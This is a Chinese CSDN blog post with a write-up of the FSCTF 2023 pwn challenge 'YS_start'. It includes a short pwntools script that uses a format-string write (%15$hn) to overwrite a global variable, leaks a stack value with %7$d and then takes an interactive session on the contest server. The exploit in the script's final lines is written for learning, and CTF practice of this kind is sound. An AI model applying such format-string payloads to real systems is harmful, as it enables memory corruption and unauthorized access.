[FSCTF 2023]YS,START!

最新推荐文章于 2024-05-29 21:13:24 发布
最新推荐文章于 2024-05-29 21:13:24 发布
阅读量85 收藏 1
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77205899/article/details/134107511
版权

YS_start

checksec

32位程序 没有开PIE

分析主程序

继续分析

io.sendline(p32(0x0804C044)+b"%15$hn"
#%15$hn 其中15为偏移  该代码的作用是将0x0804C044的值改为4 
# %n 的作用是 不打印任何内容,并将到目前为止已打印的字符数写入int变量,该参数必须是一个指向带符号的int的指针,
#  printf(“hello%n”, &test);test变量被赋值为5

偏移为15

在pwndbg中 查看内存的值 

x /10gx 0x0804C044

exp
from pwn import *
​
io = remote("node6.anna.nssctf.cn",28813)
elf = ELF("./Ys_start")
io.sendline(p32(0x0804C044)+b"%15$hn"+b"%7$d")
# %7d 的作用是
ver = io.recvuntil(b",P", drop=True)[-6:] 
#接收最后六个字符
io.sendline(b'y')
​
io.sendline(b"panyi")
io.sendline(b"panyi")
io.sendlineafter(b"ver", ver) io.interactive()

解释一下%7d 的作用

0x44-0x2c=0x18 0x18/4=6 因为v28在栈上 可以利用%6+1$d 来泄露

盼一_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
YS13-3荧光管时钟设计
lxzdsg的博客
12-26 4080
前几日,女朋友生日,问她想要啥礼物时,她提到说想要那种辉光管的自制时钟,然后上网一查,辉光管驱动电压挺高,而且管子还贵,于是折合了一下,用YS13-3荧光管代替辉光管来做时钟。废话不多说,下面介绍一下我的设计流程。 YS13-3设计思路与元器件选择原理图设计程序设计 设计思路与元器件选择 这里我采用的主控芯片是stm32f103C8T6。原因有几个,首先开发较快,用过stm32cubemx的都知道,开发效率上比传统标准库要快。其次便宜,而且好焊接。再然后是如何点亮荧光管的问题了。当初查找资料可是费了不少功夫
FSCTF 2023 PWN
Xzzzz911的博客
10-26 649
FSCTF新生赛是由中国民航大学、天津理工大学、滁州学院、吉林师范大学、三明学院(排名不分先后)等5所高校共同举办的CTF新生赛,比赛涵盖Web、Pwn、Reverse、Crypto、Misc等赛题方向。通过此次比赛,希望能够提高参赛师傅们的实践能力,促进进一步学习竞赛知识的热情,并为大家提供一个展示自我、交流合作的平台。完结撒花!!!
Vue报错:npm run start npm ERR! missing script: start
道阻且长,行则将至。
08-06 1349
Vue报错:npm run start npm ERR! missing script: start 王同学最近在学习Vue框架,今天早上运行项目时发现项目跑不动了 ,可恶可恶,明明昨天还能跑起来 ,一觉醒来代码就跑不动了 …… 报错如下 解决办法:找到package.json文件在scripts的配置上 加上下面这行代码 "start": "webpack-dev-server --hot", 在命令终端输入:npm run serve 好家伙 代码跑起来了 嘿嘿嘿 成功解决 ...
魔百盒cm201-1YS不识别
Goals1989的博客
03-22 5896
家里有一块魔百盒CM201-1一直在家积灰,由于看到网上教程可以刷各种系统,所以想着玩来试试看。先刷一个电视版安卓系统看。 盒子样子大概就是下面这样: 拿到手之后就迫不及待的将外壳拆掉了,下面这样: 然后经过各方查找教程,发现刷机如果用线刷模式不用拆开,啊啊啊,好吧,废话少说,直奔主题。 材料: 1.魔百盒CM201-1一个。 2.双公头usb线一个,用于线刷盒子时连接盒子和电脑。 3.刷机工具USB burning-tool和刷机系统镜像文件(通常位img格式)。 首先下载安装..
永硕E盘 - ys168.com 免费网盘右侧广告关闭方法
Right! I'm Max Sky.
03-12 1万+
永硕盘用了差不多8-9年,从当初的60M空间提升到1000M,虽然比起X度X盘的容量是小了很多,但是作为一个微型网盘并且带有个人二级域名(相当于自己的网站)来说,这一点让我觉得非常棒。   其实网盘首页那个广告影响并不大,关闭也不影响网站本身的推广流量,对于懂 CSS 的朋友来说就是一句 display: none 的问题,当然要加上 !important首先进入空间后台 http://www
红外编解码模块YS-NEC使用
Keygun的博客
08-22 3894
YS-NEC红外编解码模块使用起来非常方便。 通过其解码功能可以将NEC编码格式的红外信号解码为用户码和命令码其中用户码16位,命令码8位共3个字节的编码即满足了学习红外指令的要求。(其通过串口将数据发送给MCU默认波特率9600), 发送红外编码的格式为A1+F1(红外发射)+ xxxx(16位的用户码)+ xx(8位命令码)。 其中A1F1是固定的帧首部(用于发送数据时) 接收数据时对准红外接...
STM32开源代码——YS-V0.7语音识别模块程序
唯恋殊雨的博客
05-12 5878
非特征语音识别模块,内嵌有51单片机点击下载配套资料与代码(1)按照图1所示(P4 接口),连接USB 下载器,接上GND、RXD、TXD、5V(VCC 端口为3.3V 输出,方便为其他设备提供电源,在此不接),注意RXD/TXD 必须交叉连接,才能进行一收一发通信,在PC 机上打开串口调试工具,设定波特率为9600bit/s。(2)将USB 下载器连接到PC 机,查看该下载器在PC 机中占用的串...
ys数据-不懂就问
热门推荐
qq_25663533的博客
05-29 3万+
{【《X9vybcAqE5pK0gmYSF7rrPhFuvc/5Nw8GtguQXR66jv2dlKze9Vkc+5L8fH45llVMppdZpa1DJQ0ZgXrwjxo0G/YKZ299kEjcQXuSScchskek73gU4p3W7GQB5xrHdGcpI9OiV1iWhg7YsQ40KyseW+YYyoP75V3/akqWEJCcxkcEKpeCHpm+/1pCnL79Oez8xtgjaM/RMh3FL5DxA3Jl5p1ylT2mr+3nuy14BpUS1TupkknjkDs+BAKrmskv
魔百盒CM201-2-YS易视腾代工
oLaoLuo的博客
02-23 1642
魔百盒CM201-2-YS易视腾代工
YS9082HC开卡工具
12-18
YS9082HC开卡工具
YS9082HC- B17 K1
05-23
YS9082HC_ B17 K1
YS9082HC-MPToolV8 IM3D B17
10-14
支持颗粒类型YS9082HC_MPToolV8 IM3D B17 不同闪存颗粒 支持的固件不同 自己看好再下载
ys_BCE_YS-RouteSim
09-24
一个用汇编写的基于BCE32的压缩和解压引擎,作者配有比较文档
YS9082HC量产工具 开卡工具支持YS9082HC 217 B17 K1 SPI
10-14
支持颗粒类型YS9082HC 217 B17 K1 SPI 不同颗粒 开卡固件不同 自己看好。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8293
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java项目-基于Springboot+Vue的会员制医疗预约系统设计与实现(源码+数据库脚本+部署视频+代码讲解视频+全套软件
06-19
【基于Springboot+Vue的会员制医疗预约服务管理信息系统的设计与实现】高分通过项目,已获导师指导。 本项目是一套基于Springboot+Vue的会员制医疗预约服务管理信息系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者。也可作为课程设计、期末大作业 包含:项目源码、数据库脚本、开发说明文档、部署视频、代码讲解视频、全套软件等,该项目可以直接作为毕设使用。 项目都经过严格调试,确保可以运行! 项目详情: https://blog.csdn.net/u011832806/article/details/138750441
protobuf-3.19.3-cp38-cp38-manylinux2014_aarch64.whl
最新发布
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
HiMall2.6多用户B2B2C商城源码.zip
06-19
生态级B2B2C盈利模式商业平台。完备的电商功能,为企业提升了行业电商品牌的美誉度。系统安全、稳定、快速,便捷的功能扩展及可以进行二次开发的商城源码,为企业电商业务长线快速发展提供了强有力的保障。 适用企业:各类百货MALL、行业实体市场、电商产业园、行业协会、行业门户网站等。
ys9081开卡工具
11-13
ys9081是一款专业的开卡工具,主要用于制作各种类型的IC卡、ID卡、门禁卡、公交卡以及其他各种智能卡。该工具采用先进的技术和高品质的材料,具有高速度、高效率和高稳定性的特点,能够满足不同行业和场所的需求。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

盼一_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值